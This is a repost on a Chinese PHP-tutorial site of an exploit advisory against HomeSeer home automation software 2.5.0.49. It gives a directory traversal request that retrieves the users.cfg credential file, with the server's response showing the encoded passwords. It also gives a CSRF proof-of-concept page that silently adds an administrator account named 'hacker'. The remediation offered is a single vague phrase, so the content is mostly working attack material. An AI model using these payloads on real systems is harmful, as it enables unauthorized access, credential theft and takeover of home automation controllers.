来源:自学PHP网 时间:2015-04-17 13:03 作者: 阅读:次
[导读] HomeSeer Home Automation Software Multiple Web Vulnerabilities (0day)作者: Silent_Dream下载地址: http://www.homeseer.com/pub/setuphs2_5_0_49.exe影响版本: 2.5.0.49测试平台: Win XP注释: ......
HomeSeer Home Automation Software Multiple Web Vulnerabilities (0day)
作者: Silent_Dream 下载地址: http://www.homeseer.com/pub/setuphs2_5_0_49.exe 影响版本: 2.5.0.49 测试平台: Win XP 注释: This affects both HomeSeer HS2 and HomeSeer PRO. #Previously reported XSS attack vector (elog) reported to CERT was fixed in 2.5.0.49 update. A) 目录遍历: Retrieving the users.cfg file which contains HomeSeer usernames, access levels, and encrypted passwords. ncat 192.168.0.1 80 GET /..\Config\users.cfg HTTP/1.0 HTTP/1.0 200 OK Server: HomeSeer Content-Type: application/ Accept-Ranges: bytes Content-Length: 195 2 EFBBBF6775657374,EFBBBF4853454E4332774B51364D614C53436D534D41697A48617450514D513 D3D,EFBBBF31 EFBBBF64656661756C74,EFBBBF4853454E43327A68336A307A412F585153776F7032575A54534E6 3773D3D,EFBBBF36 B) 跨站请求伪造: It is possible to add a new admin user by tricking logged-in admin to visit a malicious URL. 该poc可以添加一个名和密码为hacker的管理员 <html> <body onload="javascript:document.forms[0].submit()"> <H2>HomeSeer CSRF Exploit to add new administrator account</H2> <form method="POST" name="form0" action="http://www.2cto.com /ctrl "> <input type="hidden" name="wuNEWUSERNAME" value="hacker"/> <input type="hidden" name="wuNEWUSERPASS" value="hacked"/> <input type="hidden" name="wuNEWUSERRIGHTS" value="Admin"/> <input type="hidden" name="wuNEWUSERADD" value="Add"/> <input type="hidden" name="stay_on_webusers" value="Hello"/> </form> </body> </html> 修复 加强验证 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com